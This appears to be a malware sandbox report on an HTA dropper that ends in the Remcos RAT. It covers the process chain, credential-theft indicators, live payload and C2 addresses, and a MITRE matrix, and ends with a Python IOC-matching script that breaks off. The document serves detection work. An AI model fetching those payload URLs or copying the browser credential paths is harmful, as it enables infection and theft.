                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404915 GetLocalTime,CreateEventA,CreateThread,18_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041A7A2 GetComputerNameExW,GetUserNameW,18_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,18_2_0044800F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 18_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 18_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: \key3.db 18_2_0040B335

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: Yara match, File source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: cmd.exe 18_2_00405042
                    MITRE ATT&CK Matrix (14 tactic columns; a number before a technique name is the report's hit badge for that technique)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 111 Scripting | Valid Accounts | 1 Native API | 111 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 2 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                    Email Addresses | DNS Server | Domain Accounts | 13 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Software Packing | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 211 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 DLL Side-Loading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 3 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | 4 PowerShell | Network Logon Script | 222 Process Injection | 1 Bypass User Account Control | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 222 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1559566, Sample: seethebestthignswhichgiving..., Start date: 20/11/2024, Architecture: WINDOWS, Score: 100

                    Start (node 2): contacts banaya.duckdns.org, ip.1017.filemail.com and 2 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures; Uses dynamic DNS services (banaya.duckdns.org).
                      mshta.exe 1 (node 11, started by node 2). Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found.
                        powershell.exe 36 (node 14, started by node 11). Network: 192.3.220.29, 49699, 49765, 80, AS-COLOCROSSINGUS, United States. Dropped: seehavingfacingbes...thentiretimegre.vbS (Unicode); C:\Users\user\AppData\...\2c1bgmxj.cmdline (Unicode). Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading.
                          wscript.exe 1 (node 19, started by node 14). Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures.
                            powershell.exe 7 (node 29, started by node 19). Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found.
                              powershell.exe 15 16 (node 34, started by node 29). Network: ip.1017.filemail.com, 142.215.209.78, 443, 49713, HUMBER-COLLEGECA, Canada. Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes.
                                CasPol.exe 3 15 (node 40, started by node 34). Network: banaya.duckdns.org, 192.3.101.149, 49773, 6946, AS-COLOCROSSINGUS, United States; geoplugin.net, 178.237.33.50, 49779, 80, ATOM86-ASATOM86NL, Netherlands. Dropped: C:\ProgramData\remcos\logs.dat (data). Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 5 other signatures.
                              conhost.exe (node 38, started by node 29).
                          powershell.exe 21 (node 22, started by node 14). Signatures: Loading BitLocker PowerShell Module.
                          csc.exe 3 (node 24, started by node 14). Dropped: C:\Users\user\AppData\Local\...\2c1bgmxj.dll (PE32).
                            cvtres.exe 1 (node 32, started by node 24).
                          conhost.exe (node 27, started by node 14).

                    Source | Detection | Scanner | Label | Link
                    seethebestthignswhichgivingbestopportunities.hta | 21% | ReversingLabs | Script-WScript.Trojan.Asthma | -
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/ | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/seehaving | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/HDRDDG.txt | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn | 0% | Avira URL Cloud | safe | -
                    http://crl.microsoftG | 0% | Avira URL Cloud | safe | -
                    banaya.duckdns.org | 0% | Avira URL Cloud | safe | -
                    https://www.html-code-generator.com | 0% | Avira URL Cloud | safe | -
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4 | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/ | 0% | Avira URL Cloud | safe | -
                    http://www.microsoft.W?7 | 0% | Avira URL Cloud | safe | -
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC: | 0% | Avira URL Cloud | safe | -
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    banaya.duckdns.org | 192.3.101.149 | true | true | - | unknown
                    geoplugin.net | 178.237.33.50 | true | false | - | high
                    ip.1017.filemail.com | 142.215.209.78 | true | false | - | high
                    1017.filemail.com | unknown | unknown | false | - | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF | true | Avira URL Cloud: safe | unknown
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f | false | - | high
                    http://geoplugin.net/json.gp | false | - | high
                    banaya.duckdns.org | true | Avira URL Cloud: safe | unknown
                    http://192.3.220.29/45/HDRDDG.txt | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S | powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    https://www.html-code-generator.com | mshta.exe, 00000000.00000003.1257089016.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290146069.0000000006670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242645805.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1273166507.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255793912.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1264355476.0000000006FD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251530852.0000000007041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259885383.00000000070AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242578602.0000000007446000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250574154.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250014151.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1282036247.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1271739816.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252695052.00000000066F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251672134.00000000056B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255340938.00000000074B0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1283281228.00000000066E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252283963.000000000675C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255426669.0000000007440000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290936484.0000000007040000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252470032.00000000066E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://192.3.220.29/45/seehaving | powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://crl.microsoftG | powershell.exe, 00000003.00000002.1310086977.0000000008AA2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    http://geoplugin.net/json.gpl | CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    https://go.micro | powershell.exe, 00000001.00000002.1414653804.000000000550D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                                https://contoso.com/Licensepowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://1017.filemail.compowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEMpowershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4powershell.exe, 00000010.00000002.1669609816.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore6LRpowershell.exe, 0000000E.00000002.2079393910.00000000051DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://go.microspowershell.exe, 00000003.00000002.1303936513.000000000584F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://geoplugin.net/json.gpSystem32CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://192.3.220.29/powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://geoplugin.net/json.gp/Cpowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFnpowershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.microsoft.W?7powershell.exe, 00000003.00000002.1310452454.0000000008AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.3.220.29 | unknown | United States (US) | 36352 | AS-COLOCROSSING | true
142.215.209.78 | ip.1017.filemail.com | Canada (CA) | 32156 | HUMBER-COLLEGE | false
192.3.101.149 | banaya.duckdns.org | United States (US) | 36352 | AS-COLOCROSSING | true
178.237.33.50 | geoplugin.net | Netherlands (NL) | 8455 | ATOM86-ASATOM86 | false
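The rule set below is an added example, not part of the Joe Sandbox report, showing how the network indicators above would be applied to endpoint DNS telemetry rather than to a blocklist alone. It takes only the entries the report marks Malicious: true as hard indicators (192.3.220.29, 192.3.101.149, banaya.duckdns.org). geoplugin.net and filemail.com are marked not malicious, so they are scored only in combination with an unexpected client process: here CasPol.exe, the process whose memory holds the geoplugin.net URL in the table above. The Sysmon Event ID 22 field layout, the file paths and the log lines are constructed for the example and are assumptions, not data from the report.

```python
"""Match this report's network IOCs against Sysmon Event ID 22 (DNS query) records.

Added example, not part of the Joe Sandbox report.  Indicator values are taken
from the report's IP/domain table; the log lines, field layout and file paths
below are constructed for the example.
"""
import re
from dataclasses import dataclass, field

# Hard indicators: entries the report marks Malicious = true.
MALICIOUS_IPS = {"192.3.220.29", "192.3.101.149"}
MALICIOUS_DOMAINS = {"banaya.duckdns.org"}
# Marked not malicious in the report (a public geolocation service), but it
# recurs across the Remcos-tagged pivots, so it is scored only together with
# an unexpected client process.
WEAK_SIGNAL_DOMAINS = {"geoplugin.net"}
# Dynamic-DNS provider used by the C2 domain above.
DYNDNS_SUFFIXES = (".duckdns.org",)
# Processes for which a geolocation lookup is unremarkable (assumed list).
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
# Hosts that have no business resolving names; CasPol.exe is the process the
# report shows holding the geoplugin.net URL in memory.
UNUSUAL_RESOLVERS = {"caspol.exe"}

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}

# Constructed Sysmon EID 22 records flattened to one line each (assumed layout).
SAMPLE_EVENTS = [
    r"Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe QueryName: banaya.duckdns.org QueryResults: ::ffff:192.3.101.149;",
    r"Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe QueryName: geoplugin.net QueryResults: ::ffff:178.237.33.50;",
    r"Image: C:\Program Files\Google\Chrome\Application\chrome.exe QueryName: geoplugin.net QueryResults: ::ffff:178.237.33.50;",
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe QueryName: 1017.filemail.com QueryResults: ::ffff:142.215.209.78;",
    r"Image: C:\Program Files\Google\Chrome\Application\chrome.exe QueryName: www.microsoft.com QueryResults: ::ffff:203.0.113.10;",
]

EVENT_RE = re.compile(
    r"Image:\s*(?P<image>.+?)\s+QueryName:\s*(?P<query>\S+)\s+QueryResults:\s*(?P<results>.*)"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Finding:
    severity: str
    image: str
    query: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Return (image_basename, image_path, query, resolved_ipv4s) or None."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    image = m.group("image").strip()
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    query = m.group("query").rstrip(".").lower()
    ips = set(IPV4_RE.findall(m.group("results")))
    return basename, image, query, ips


def evaluate(basename, image, query, ips):
    """Apply the rules to one parsed event; return a Finding or None.

    Every matching rule contributes a reason; the finding takes the highest
    severity among them, so an IOC hit is never downgraded by weaker rules.
    """
    hits = []
    if query in MALICIOUS_DOMAINS:
        hits.append(("high", f"query {query} is a report IOC"))
    ioc_ips = sorted(ips & MALICIOUS_IPS)
    if ioc_ips:
        hits.append(("high", "resolved to report IOC " + ", ".join(ioc_ips)))
    if query.endswith(DYNDNS_SUFFIXES):
        hits.append(("medium", "dynamic DNS domain"))
    if query in WEAK_SIGNAL_DOMAINS and basename not in BROWSERS:
        hits.append(("medium", f"geolocation lookup from non-browser {basename}"))
    if basename in UNUSUAL_RESOLVERS:
        hits.append(("medium", f"{basename} is not expected to resolve names"))
    if not hits:
        return None
    severity = max((s for s, _ in hits), key=SEVERITY_RANK.__getitem__)
    return Finding(severity, image, query, [r for _, r in hits])


def analyze(lines):
    """Run every line through parse_event/evaluate; return findings in order."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        finding = evaluate(*parsed)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
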